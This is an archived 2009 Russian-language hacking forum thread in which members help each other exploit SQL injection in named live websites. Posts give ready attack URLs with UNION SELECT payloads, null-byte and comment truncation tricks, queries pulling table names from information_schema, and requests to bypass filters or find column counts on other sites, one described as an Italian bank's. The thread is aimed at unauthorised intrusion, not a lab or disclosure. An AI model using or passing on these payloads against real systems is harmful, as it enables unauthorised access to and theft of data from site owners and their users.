ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.06.2009, 21:13
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
prescott, попробуй обрезать нуль-байтом.
К примеру:
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7%00
http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7
__________________
включи голову
|
|
|
09.06.2009, 00:50
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
prescott,
#%0A# проверь
|
|
|
|
09.06.2009, 03:55
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Это сути дела не меняет(перевод строки то останется в старом запросе), будет:
WHERE 1 AND cats.id = 145 [INJECT]#
#
GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
Попробуй продолжить запрос, например:
SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = -98145 union select 1,(select 1 from table limit 1),3 from cats GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
правда в 5-как с альясами при union выдаст тебе что cats.id - нема такой таблички(Unknown column 'id' in 'order clause'):
Also, if a column to be sorted is aliased, the ORDER BY clause must refer to the alias, not the column name.
Последний раз редактировалось PaCo; 09.06.2009 в 04:10..
|
|
|
|
12.06.2009, 15:43
|
|
Новичок
Регистрация: 08.06.2009
Сообщений: 4
Провел на форуме:
7573
Репутация:
6
|
|
Сообщение от PaCo
Попробуй продолжить запрос, например:
SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = -98145 union select 1,(select 1 from table limit 1),3 from cats GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
правда в 5-как с альясами при union выдаст тебе что cats.id - нема такой таблички(Unknown column 'id' in 'order clause'):
Also, if a column to be sorted is aliased, the ORDER BY clause must refer to the alias, not the column name.
вы неверно уловили суть проблемы, во
1-ых. по за-альяс'иным колонкам сортирует только груп, который находится в строке с inj.(%23)
2. у group другая ошибка
3. group в отличии от ордер бай в таких запросах сортирует ближайшую выборку
4. +не уверен, но group (в отличии от order) выполняется до формирования столбцов из select, а значит не должен ссылатся на альясы
5. даже если бы проблема была в group, альяс или колонку можно было бы вписать во вторую выборку
немного практики- узнаем имя бд(блинд или +union select 1 from lala%23)
и составляем запрос в такoм дуxe:
SELECT cats.*,
IF(subcats.id IS NULL, 'N', 'Y') AS has_subcats,
subcats.name AS subcat_name,
parentcat.name AS parentcat_name
FROM cats
LEFT JOIN cats AS subcats ON subcats.parent_id = cats.id
LEFT JOIN cats AS parentcat ON parentcat.id = cats.parent_id
WHERE 1 AND cats.id = 145 union select cats.*,table_name,1,2 from имя_базы.cats,information_schema.tables
GROUP BY cats.id
ORDER BY cats.order_fld,cats.name
конкретно здесь работать не будет, потаму что поля в ордербае задаются в виде имя_табл.колонка (что не катит в двойных запросах)
но если в вашей многострочной скуле order by поле то этот способ вам поможет)
|
|
|
|
13.06.2009, 01:45
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Сообщение от ?maybe
вы неверно уловили суть проблемы, во
1-ых. по за-альяс'иным колонкам сортирует только груп, который находится в строке с inj.(%23)
Не согласен, при UNION по альясным колонкам в MySQL 5 нужно сортировать ТОЛЬКО ORDER http://dev.mysql.com/doc/refman/5.1/en/union.html:
Also, if a column to be sorted is aliased, the ORDER BY clause must refer to the alias, not the column name. The first of the following statements will work, but the second will fail with an Unknown column 'a' in 'order clause' error
конкретно здесь работать не будет, потому что поля в ордербае задаются в виде имя_табл.колонка (что не катит в двойных запросах)
Конкретно ни где это работать не будет(если продемострируете работоспобный запрос для 5 версии MySQL то я буду только рад этому) изходя из первого условия для UNION,ORDER BY и MySQL 5. Согласен с of ORDER BY cannot use column references that include a table name но я и не утверждал что это не так. Ваш запрос такой же не работоспособный был бы если в ORDER сортировался просто по именни колонки без table name.
+Боюсь предположить что это при определеных условиях вызовет - #1222 - The used SELECT statements have a different number of columns
|
|
|
|
13.06.2009, 02:56
|
|
Новичок
Регистрация: 08.06.2009
Сообщений: 4
Провел на форуме:
7573
Репутация:
6
|
|
Не согласен, при UNION по альясным колонкам в MySQL 5 нужно сортировать ТОЛЬКО ORDER
я говорил про этот запрос, а не образно)
=>2
select columns.*,1,2/*или сколько там*/ from columns order by columns.column_name
select columns.*,1,2 from columns union select tables.* from tables order by columns.column_name
select columns.*,1,2 from columns union select tables.* from tables order by column_name
+Боюсь предположить что это при определеных условиях вызовет
например?)
|
|
|
|
09.06.2009, 21:00
|
|
Новичок
Регистрация: 14.07.2008
Сообщений: 11
Провел на форуме:
263330
Репутация:
8
|
|
Здравствуйте, прошу помочь обойти фильтры в скуле:
http://www.terra.mu/list.php?c=download&s=title&o=&p=&w=asc%2527
|
|
|
|
09.06.2009, 22:38
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Мало того, что там инъекция после order by ПОЛЕ, еще и фильрация (кривая, но пашущая). Хз, получиться ли что-то из этого.
|
|
|
|
10.06.2009, 09:38
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
ttp://www.otoptravel.com/Qua.php?id=1
MsSQL. Не выводятся даные. |
|
|
|
10.06.2009, 13:06
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Не могу подобрать НИ количество столбцов и полей, как только я не крутил....не понимаю в чем проблема....
вот ссыль: http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318 (MYSQL Injection)
При любом раскладе пишет: The used SELECT statements have a different number of columns
если кто нить подберет,расскажите пожалуйста.
П.С. Сайт итальянского банка.
Последний раз редактировалось jecka3000; 10.06.2009 в 13:16..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид